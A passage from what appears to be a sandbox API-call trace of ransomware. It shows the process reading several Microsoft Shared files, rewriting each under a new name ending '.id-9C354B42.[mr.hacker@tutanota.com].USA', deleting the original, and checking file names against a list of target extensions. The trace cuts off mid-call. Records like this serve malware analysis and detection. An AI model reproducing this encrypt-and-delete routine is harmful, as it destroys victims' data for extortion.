CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0054.001] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.001] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.001] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.002] GetLastError () returned 0x0 [0054.002] ReadFile (in: hFile=0x168, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x99ba0, lpOverlapped=0x0) returned 1 [0054.015] WriteFile (in: hFile=0x218, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x99bb0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x99bb0, lpOverlapped=0x0) returned 1 [0054.034] ReadFile (in: hFile=0x168, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.034] WriteFile (in: hFile=0x218, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.034] SetEndOfFile (hFile=0x218) returned 1 [0054.034] CloseHandle (hObject=0x218) returned 1 [0054.034] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.034] SetEndOfFile (hFile=0x168) returned 1 [0054.039] CloseHandle (hObject=0x168) returned 1 [0054.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.039] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 1 [0054.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.039] lstrlenW (lpString=".doc") returned 4 [0054.039] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0054.040] lstrlenW (lpString=".docx") returned 5 [0054.040] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0054.040] lstrlenW (lpString=".pdf") returned 4 [0054.040] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0054.040] lstrlenW (lpString=".xls") returned 4 [0054.040] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0054.040] lstrlenW (lpString=".xlsx") returned 5 [0054.040] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0054.040] lstrlenW (lpString=".ppt") returned 4 [0054.040] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0054.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.040] lstrlenW (lpString=".zip") returned 4 [0054.040] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0054.040] lstrlenW (lpString=".rar") returned 4 [0054.040] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0054.040] lstrlenW (lpString=".bz2") returned 4 [0054.040] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0054.040] lstrlenW (lpString=".7z") returned 3 [0054.040] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0054.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.040] lstrlenW (lpString=".dbf") returned 4 [0054.040] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0054.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.040] lstrlenW (lpString=".1cd") returned 4 [0054.040] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0054.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.040] lstrlenW (lpString=".jpg") returned 4 [0054.040] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0054.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.040] lstrlenW (lpString=".doc") returned 4 [0054.040] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0054.040] lstrlenW (lpString=".docx") returned 5 [0054.040] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0054.041] lstrlenW (lpString=".pdf") returned 4 [0054.041] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0054.041] lstrlenW (lpString=".xls") returned 4 [0054.041] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0054.041] lstrlenW (lpString=".xlsx") returned 5 [0054.041] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0054.041] lstrlenW (lpString=".ppt") returned 4 [0054.041] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0054.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.041] lstrlenW (lpString=".zip") returned 4 [0054.041] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0054.041] lstrlenW (lpString=".rar") returned 4 [0054.041] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0054.041] lstrlenW (lpString=".bz2") returned 4 [0054.041] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0054.041] lstrlenW (lpString=".7z") returned 3 [0054.041] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0054.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.041] lstrlenW (lpString=".dbf") returned 4 [0054.041] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0054.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.041] lstrlenW (lpString=".1cd") returned 4 [0054.041] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0054.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0054.041] lstrlenW (lpString=".jpg") returned 4 [0054.041] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0054.041] lstrcmpiW (lpString1=".EXE", lpString2=".USA") returned -1 [0054.041] lstrlenW (lpString="EQNEDT32.EXE") returned 12 [0054.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.045] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=543304) returned 1 [0054.045] CloseHandle (hObject=0x218) returned 1 [0054.045] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 0x20 [0054.045] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.045] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.045] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.045] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.045] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0054.046] GetLastError () returned 0x0 [0054.046] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x84a48, lpOverlapped=0x0) returned 1 [0054.058] WriteFile (in: hFile=0x1f0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x84a50, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x84a50, lpOverlapped=0x0) returned 1 [0054.068] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.068] WriteFile (in: hFile=0x1f0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.068] SetEndOfFile (hFile=0x1f0) returned 1 [0054.068] CloseHandle (hObject=0x1f0) returned 1 [0054.068] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.068] SetEndOfFile (hFile=0x218) returned 1 [0054.219] CloseHandle (hObject=0x218) returned 1 [0054.219] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.219] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 1 [0054.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.220] lstrlenW (lpString=".doc") returned 4 [0054.220] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0054.220] lstrlenW (lpString=".docx") returned 5 [0054.220] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1 [0054.220] lstrlenW (lpString=".pdf") returned 4 [0054.220] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0054.220] lstrlenW (lpString=".xls") returned 4 [0054.220] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0054.220] lstrlenW (lpString=".xlsx") returned 5 [0054.220] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1 [0054.220] lstrlenW (lpString=".ppt") returned 4 [0054.220] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.220] lstrlenW (lpString=".zip") returned 4 [0054.220] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0054.220] lstrlenW (lpString=".rar") returned 4 [0054.220] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0054.220] lstrlenW (lpString=".bz2") returned 4 [0054.220] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0054.220] lstrlenW (lpString=".7z") returned 3 [0054.220] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.220] lstrlenW (lpString=".dbf") returned 4 [0054.220] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.220] lstrlenW (lpString=".1cd") returned 4 [0054.220] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.220] lstrlenW (lpString=".jpg") returned 4 [0054.220] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.220] lstrlenW (lpString=".doc") returned 4 [0054.220] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0054.220] lstrlenW (lpString=".docx") returned 5 [0054.221] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1 [0054.221] lstrlenW (lpString=".pdf") returned 4 [0054.221] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0054.221] lstrlenW (lpString=".xls") returned 4 [0054.221] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0054.221] lstrlenW (lpString=".xlsx") returned 5 [0054.221] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1 [0054.221] lstrlenW (lpString=".ppt") returned 4 [0054.221] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0054.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.221] lstrlenW (lpString=".zip") returned 4 [0054.221] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0054.221] lstrlenW (lpString=".rar") returned 4 [0054.221] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0054.221] lstrlenW (lpString=".bz2") returned 4 [0054.221] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0054.221] lstrlenW (lpString=".7z") returned 3 [0054.221] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0054.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.221] lstrlenW (lpString=".dbf") returned 4 [0054.221] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0054.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.221] lstrlenW (lpString=".1cd") returned 4 [0054.221] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0054.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0054.221] lstrlenW (lpString=".jpg") returned 4 [0054.221] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0054.221] lstrcmpiW (lpString1=".manifest", lpString2=".USA") returned -1 [0054.221] lstrlenW (lpString="eqnedt32.exe.manifest") returned 21 [0054.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.222] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=566) returned 1 [0054.222] CloseHandle (hObject=0x218) returned 1 [0054.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 0x20 [0054.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.222] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.222] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.222] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.222] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0054.223] GetLastError () returned 0x0 [0054.223] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x236, lpOverlapped=0x0) returned 1 [0054.224] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x240, lpOverlapped=0x0) returned 1 [0054.224] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.224] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xfe, lpOverlapped=0x0) returned 1 [0054.224] SetEndOfFile (hFile=0x174) returned 1 [0054.225] CloseHandle (hObject=0x174) returned 1 [0054.225] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.225] SetEndOfFile (hFile=0x218) returned 1 [0054.226] CloseHandle (hObject=0x218) returned 1 [0054.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.228] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.229] lstrlenW (lpString=".doc") returned 4 [0054.229] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0054.229] lstrlenW (lpString=".docx") returned 5 [0054.229] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0054.229] lstrlenW (lpString=".pdf") returned 4 [0054.229] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0054.229] lstrlenW (lpString=".xls") returned 4 [0054.229] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0054.229] lstrlenW (lpString=".xlsx") returned 5 [0054.229] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0054.229] lstrlenW (lpString=".ppt") returned 4 [0054.229] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.229] lstrlenW (lpString=".zip") returned 4 [0054.229] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0054.229] lstrlenW (lpString=".rar") returned 4 [0054.229] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0054.229] lstrlenW (lpString=".bz2") returned 4 [0054.229] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0054.229] lstrlenW (lpString=".7z") returned 3 [0054.229] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.229] lstrlenW (lpString=".dbf") returned 4 [0054.229] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.229] lstrlenW (lpString=".1cd") returned 4 [0054.229] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.229] lstrlenW (lpString=".jpg") returned 4 [0054.229] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.230] lstrlenW (lpString=".doc") returned 4 [0054.230] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0054.230] lstrlenW (lpString=".docx") returned 5 [0054.230] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0054.230] lstrlenW (lpString=".pdf") returned 4 [0054.230] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0054.230] lstrlenW (lpString=".xls") returned 4 [0054.230] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0054.230] lstrlenW (lpString=".xlsx") returned 5 [0054.230] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0054.230] lstrlenW (lpString=".ppt") returned 4 [0054.230] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0054.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.230] lstrlenW (lpString=".zip") returned 4 [0054.230] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0054.230] lstrlenW (lpString=".rar") returned 4 [0054.230] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0054.230] lstrlenW (lpString=".bz2") returned 4 [0054.230] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0054.230] lstrlenW (lpString=".7z") returned 3 [0054.230] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0054.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.230] lstrlenW (lpString=".dbf") returned 4 [0054.230] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0054.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.230] lstrlenW (lpString=".1cd") returned 4 [0054.230] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0054.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0054.230] lstrlenW (lpString=".jpg") returned 4 [0054.230] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0054.231] lstrcmpiW (lpString1=".HLP", lpString2=".USA") returned -1 [0054.231] lstrlenW (lpString="EQNEDT32.HLP") returned 12 [0054.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.231] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=176311) returned 1 [0054.231] CloseHandle (hObject=0x218) returned 1 [0054.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 0x20 [0054.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.231] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.231] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 